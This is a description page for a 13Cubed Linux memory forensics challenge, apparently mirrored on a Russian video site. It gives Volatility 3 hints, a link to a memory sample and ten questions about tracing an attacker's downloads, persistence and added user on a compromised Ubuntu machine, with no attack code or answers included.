Linux Memory Forensics Challenge
Welcome to a special Linux Memory Forensics Challenge from 13Cubed. This is an excellent opportunity to get some hands-on practice with Linux memory forensics. You'll find the questions below, as well as a link to download the memory sample needed to answer those questions.
🎉 Check out the official training courses from 13Cubed at https://training.13cubed.com!
HINT 1: To get started, run the Volatility 3 banners plugin to determine the correct kernel version, and subsequently install the correct symbols and create the ISF.
HINT 2: The kernel version in use on this Ubuntu 22.04 machine was 6.5.0-41. It is recommended that Ubuntu 22.04 be used for the analysis.
🛑 CONTEST IS CLOSED 🛑
All winners have been selected. We still encourage you to participate in the lab, as we believe it will serve as an excellent practice opportunity. If you do participate, please consider creating a video or blog-based walkthrough of the process, as it would be a valuable resource for the community!
👉 Memory Sample
https://13cubed.s3.amazonaws.com/down...
✏️ Challenge Questions
Question 1:
What is the hostname of this device?
Question 2:
What is the username of the primary user on this device?
Question 3:
What is the IP address assigned to this device?
Question 4:
What is the name of the malicious file downloaded by the victim?
Question 5:
What is the PID associated with the execution of the file downloaded by the victim?
Question 6:
What is the PID spawned by that process?
Question 7:
What is the full name and path of the malicious process used for persistence?
Question 8:
What is the full path and filename of the file created via a popular text editor?
Question 9:
What is the IP address from which one of the malicious binaries was downloaded?
HINT: This is a difficult question. Don't make assumptions. If you are unable to find a plugin that can provide you with this information, consider more "foundational" approaches to enumerating data within the memory dump.
Question 10:
A user was manually added to this device by the Threat Actor. The UID is 1001. What is the username?
HINT: This is a difficult question. Don't make assumptions. If you are unable to find a plugin that can provide you with this information, consider more "foundational" approaches to enumerating data within the memory dump.
-----
Walkthrough by J Smith:
/ solving-the-13cubed-linux-memory-forensics...
Walkthrough by Andrew Malec:
https://www.iblue.team/ctf-challenges...
#Forensics #DigitalForensics #DFIR #ComputerForensics #WindowsForensics #MemoryForensics
Смотрите видео Linux Memory Forensics Challenge онлайн без регистрации, длительностью часов минут секунд в хорошем качестве. Это видео добавил пользователь 13Cubed 30 Сентябрь 2024, не забудьте поделиться им ссылкой с друзьями и знакомыми, на нашем сайте его посмотрели 2,90 раз и оно понравилось 9 людям.